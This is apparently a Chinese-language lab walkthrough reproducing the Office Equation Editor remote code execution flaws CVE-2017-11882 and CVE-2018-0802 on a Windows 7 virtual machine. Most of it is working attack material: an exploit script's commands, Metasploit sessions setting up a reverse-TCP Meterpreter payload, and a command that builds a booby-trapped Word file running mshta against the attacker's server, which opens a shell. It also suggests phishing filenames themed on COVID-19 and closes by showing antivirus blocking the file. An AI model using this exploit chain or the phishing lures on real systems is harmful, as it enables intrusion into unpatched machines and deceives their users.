漏洞復現-Office遠程代碼執行漏洞 (CVE-2017-11882&CVE-2018-0802)

漏洞原理

這兩個漏洞本質都是由Office默認安裝的公式編輯器(EQNEDT32.EXE)引發的棧溢出漏洞(不要問什么是棧溢出，咱也解釋不了/(ㄒoㄒ)/~~)

 

影響版本

Office 365

Microsoft Office 2000      

Microsoft Office 2003      

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2

Microsoft Office 2013 Service Pack 1

Microsoft Office 2016

 

復現環境

1. OS版本：Win7旗艦版SP1(虛擬機)，開啟防火牆，沒有裝殺毒軟件

2. Office版本：Professional Plus 2013 64Bit

3. Python2.7：跑腳本要用到

 

復現過程

1. 相關設置

打開Word，找到菜單：插入-對象，檢查新建列表是否有下列選項，沒有則無法復現

最開始為了圖方便在網上下了個綠色版的office2010，里面沒有這個選項，無法復現，且打開帶病毒的word時會報這個錯：

不需要啟用宏，前面說了，這個是公式編輯器引發的漏洞，跟宏沒啥關系，我沒啟用宏：

 2. 檢查是否存在漏洞

下載腳本：https://github.com/Ridter/RTF_11882_0802/

輸入下面的命令：

python RTF_11882_0802.py -c "cmd.exe /c calc.exe" -o calc.doc

雙擊打開calc.doc，如果彈出計算器說明存在漏洞：

3. 漏洞利用

msf搜了一下，有現成的EXP

msf5 > use exploit/windows/fileformat/office_ms17_11882
msf5 exploit(windows/fileformat/office_ms17_11882) > show options
                                                                                                                                                              
Module options (exploit/windows/fileformat/office_ms17_11882):                                                                                                
                                                                                                                                                              
   Name         Current Setting  Required  Description                                                                                                        
   ----         ---------------  --------  -----------                                                                                                        
   FILENAME     msf.rtf          yes       Filename to save as, or inject                                                                                     
   FOLDER_PATH                   no        Path to file to inject                                                                                             
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0                               
   SRVPORT      8080             yes       The local port to listen on.                                                                                       
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office


msf5 exploit(windows/fileformat/office_ms17_11882) > set FILENAME test.doc
FILENAME => test.doc
msf5 exploit(windows/fileformat/office_ms17_11882) > set LHOST 192.168.119.129
LHOST => 192.168.119.129
msf5 exploit(windows/fileformat/office_ms17_11882) > exploit

很遺憾的是shell一直彈不過來。。。

網上找了另一個EXP(參考：https://myzxcg.github.io/20180921.html)：

msf5 exploit(windows/fileformat/office_ms17_11882) > use exploits/windows/smb/PS_shell
msf5 exploit(windows/smb/PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/PS_shell) > show options

Module options (exploit/windows/smb/PS_shell):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(windows/smb/PS_shell) > set LHOST 192.168.119.129
LHOST => 192.168.119.129
msf5 exploit(windows/smb/PS_shell) > set LPORT 4445
LPORT => 4445
msf5 exploit(windows/smb/PS_shell) > set URIPATH 235
URIPATH => 235
msf5 exploit(windows/smb/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.119.129:4445 
[*] Using URL: http://0.0.0.0:8080/235
[*] Local IP: http://192.168.119.129:8080/235
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.119.129:8080/235"
msf5 exploit(windows/smb/PS_shell) > [*] 192.168.119.136 PS_shell - Delivering payload
[*] Sending stage (180291 bytes) to 192.168.119.136
[*] Meterpreter session 1 opened (192.168.119.129:4445 -> 192.168.119.136:49402) at 2020-06-18 05:04:19 -0400

生成病毒文件：

python RTF_11882_0802.py -c "mshta http://192.168.119.129:8080/235" -o new.doc

new.doc打開之后就是普通word文檔的樣子，看不出什么異常：

但是打開之后，kali成功收到反彈shell，權限為當前登錄用戶權限（好像個人windows登錄基本都是admin權限O(∩_∩)O ），即使打開后又關閉了new.doc，session依然可用，那關機了session還在么？你想多了哈哈哈

 不曉得為啥執行不了whoami命令。。。

這個遠程代碼執行漏洞最關鍵的一步是在被攻擊機器上打開帶病毒的word文件，所以實際場景中釣魚比較多，取一個讓人有打開欲望的文件名，比如之前通報過的新冠感染診斷，武漢旅行信息搜集表等，如果剛好你的系統裝了office且沒有即時打補丁，恭喜你~

但是釣魚有一個致命缺陷就是：只要你不點開，我就沒辦法，哈哈哈~

 

拓展學習

上面的復現過程是在沒有裝殺毒軟件的情況下進行的，接下來在Win7虛擬機上裝一個某某毒霸，再次打開new.doc，被檢測到了

點擊上圖的"阻止並關閉"選項后打開word，kali就無法接收到反彈shell了。所以，記得裝殺毒軟件(我想最差的殺毒軟件對已知漏洞都是會防護的)，不要裸奔~

 

本文僅用於技術學習和交流，嚴禁用於非法用途，否則產生的一切后果自行承擔。  

如需轉載，請注明出處，這是對他人勞動成果的尊重。